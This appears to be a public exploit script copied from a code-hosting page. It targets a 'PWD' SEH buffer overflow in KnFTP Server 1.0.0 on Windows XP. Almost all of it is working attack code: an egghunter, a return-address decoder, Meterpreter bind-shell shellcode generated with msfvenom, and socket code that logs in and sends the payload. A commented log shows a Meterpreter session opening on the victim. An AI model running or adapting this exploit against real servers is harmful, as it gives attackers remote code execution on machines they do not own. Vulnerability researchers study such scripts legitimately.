Permalink
Find file
Fetching contributors…
Cannot retrieve contributors at this time
100 lines (89 sloc) 3.59 KB
#!/usr/bin/python
import socket
#
#root@nasro:~/xploits/knftpd# python exploit.py
#[*]Connecting ...
#[*]Sending USER and PASS ...
#[*]Sending Shellcode ...
#[*]Triggering the crash ...
#[*]Done, connect to Meterpreter on port 4444.
#
#msf exploit(handler) > run
#[*] Starting the payload handler...
#[*] Started bind handler
#[*] Sending stage (885806 bytes) to 192.168.1.201
#[*] Meterpreter session 1 opened (192.168.1.7:47489 -> 192.168.1.201:4444) at 2015-10-24 12:21:19 -0400
#meterpreter >
#
# Exploit Title: KnFTP Server 1.0.0 <- "PWD" SEH buffer overflow
# Date: 25/10/2015
# Exploit Author: Nasro
# Writeup : https://rootatnasro.wordpress.com/2015/10/25/windows-exploit-developement-the-hard-way/
# Vendor Homepage:
# Software Link: https://www.exploit-db.com/apps/182e4b13190ed23c06c8647dda9198dd-knftpd-1.0.0-bin.zip
# Version: 1.0.0
# Tested on: Windows XP SP3
junk = "\x90"*200 # junk data
seh = "\xcb\x11\x40" # pop pop ret 0x004011CB | startnull {PAGE_EXECUTE_READ} [knftpd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False
#metasm > jmp $-28
#"\xeb\xe2"
jmp_back="\xeb\xe2\xff\xff" # jmp back 28 bytes
#AND EAX,41414141
#AND EAX,3E3E3E3E
#SUB EAX,4B4A687D
#SUB EAX,6A3C0951
#SUB EAX,4A3B5468
#NOP
ret_addr_decode ="\x25\x41\x41\x41\x41\x25\x3E\x3E\x3E\x3E\x2D\x7D\x68\x4A\x4B\x2D\x51\x09\x3C\x6A\x2D\x68\x54\x3B\x4A\x50\x90" #EAX=003E38DF
#metasm > jmp eax
#"\xff\xe0"
jmp_eax="\xFF\xE0" #JMP EAX
#msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -b "\x00\xff" -f py
#Payload size: 326 bytes
shellcode = ( "T00WT00W"+"\xbe\xbd\x5e\x57\xba\xdb\xc0\xd9\x74\x24\xf4\x58\x31"
"\xc9\xb1\x4b\x31\x70\x15\x83\xc0\x04\x03\x70\x11\xe2"
"\x48\xa2\xbf\x38\xb2\x5b\x40\x5d\x3b\xbe\x71\x5d\x5f"
"\xca\x22\x6d\x14\x9e\xce\x06\x78\x0b\x44\x6a\x54\x3c"
"\xed\xc1\x82\x73\xee\x7a\xf6\x12\x6c\x81\x2a\xf5\x4d"
"\x4a\x3f\xf4\x8a\xb7\xcd\xa4\x43\xb3\x63\x59\xe7\x89"
"\xbf\xd2\xbb\x1c\xc7\x07\x0b\x1e\xe6\x99\x07\x79\x28"
"\x1b\xcb\xf1\x61\x03\x08\x3f\x38\xb8\xfa\xcb\xbb\x68"
"\x33\x33\x17\x55\xfb\xc6\x66\x91\x3c\x39\x1d\xeb\x3e"
"\xc4\x25\x28\x3c\x12\xa0\xab\xe6\xd1\x12\x10\x16\x35"
"\xc4\xd3\x14\xf2\x83\xbc\x38\x05\x40\xb7\x45\x8e\x67"
"\x18\xcc\xd4\x43\xbc\x94\x8f\xea\xe5\x70\x61\x13\xf5"
"\xda\xde\xb1\x7d\xf6\x0b\xc8\xdf\x9f\xf8\xe0\xdf\x5f"
"\x97\x73\x93\x6d\x38\x2f\x3b\xde\xb1\xe9\xbc\x21\xe8"
"\x4d\x52\xdc\x13\xad\x7a\x1b\x47\xfd\x14\x8a\xe8\x96"
"\xe4\x33\x3d\x02\xee\x92\xee\x30\x0d\x4e\x0e\xde\xec"
"\xe7\xfa\x11\x2e\x17\x05\xf8\x47\xb0\xf8\x02\x79\x1d"
"\x74\xe4\x13\x8d\xd0\xbf\x8b\x6f\x07\x08\x2b\x8f\x6d"
"\xf3\x73\x1a\xd6\xac\x1b\x52\x0f\x6a\x23\x63\x05\xdd"
"\xb3\xe8\x4a\xda\xa2\xee\x46\x4b\xb2\x79\x1c\x1d\xf1"
"\x18\x21\x34\x63\xdb\xb7\xb2\x22\x8c\x2f\xb8\x13\xfa"
"\xef\x43\x76\x78\xf7\xbb\x07\x52\x83\x8d\x9d\xec\xfb"
"\xf1\x71\xed\xfb\xa7\x1b\xed\x93\x1f\x78\xbe\x86\x60"
"\x55\xd2\x1a\xf4\x56\x83\xcf\x5f\x3f\x29\x29\x97\xe0\xd2"
"\x1c\xa4\xe7\x2d\xe1\xad\x16\xed\x34\x77\x6d\x18\x85")
#tag: W00T
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
buffer = junk + egghunter + "\x90"*59 + ret_addr_decode + jmp_eax + jmp_back + seh
print "[*]Connecting ..."
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.201',21))
s.recv(1024)
print "[*]Sending USER and PASS ..."
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
print "[*]Sending shellcode ..."
s.send('CWD ' + shellcode + '\r\n')
s.recv(1024)
print "[*]Triggering the crash, ph33r ..."
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
print "[*]Done, connect to Meterpreter on port 4444."